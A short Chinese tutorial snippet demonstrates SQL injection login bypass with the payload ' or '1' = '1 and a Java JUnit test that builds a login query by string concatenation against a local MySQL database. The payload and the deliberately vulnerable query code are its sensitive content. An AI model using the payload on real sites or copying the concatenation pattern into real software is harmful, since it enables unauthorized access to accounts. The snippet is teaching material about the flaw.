注入核心代码: ' or '1' = '1
拼接后,得恒等式:
select * from tb_user where username ='ahfahfkl' and password = '' or '1' = '1'
查询后得所有用户,直接登录成功。当然目前所有实际运营的网站几乎都解决了这个漏洞。
import org.junit.jupiter.api.Test;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.Statement;
public class JDBC_UserLogin_SqlZhuRu {
@Test
public void testSqlZhuRu() throws Exception {
/*jdbc驱动*/
Class.forName("com.mysql.jdbc.Driver");
String url = "jdbc:mysql://127.0.0.1:3306/db1?useSSL=false";
String usename = "root";
String password = "root";/*获取数据库连接*/
Connection connection = DriverManager.getConnection(url,usename,password);
String name = "ahfahfkl";
String pwd = "' or '1' = '1";
/*拼接sql语句*/
String sql = "select * from tb_user where username ='"+name+"' and password = '"+pwd+"'";
/*获取statement对象*/
Statement statement = connection.createStatement();
/*执行sql*/
ResultSet rs = statement.executeQuery(sql);
if(rs.next()){
System.out.println("登录成功");
}else{
System.out.println("登录失败");
}
rs.close();
statement.close();
connection.close();
}
}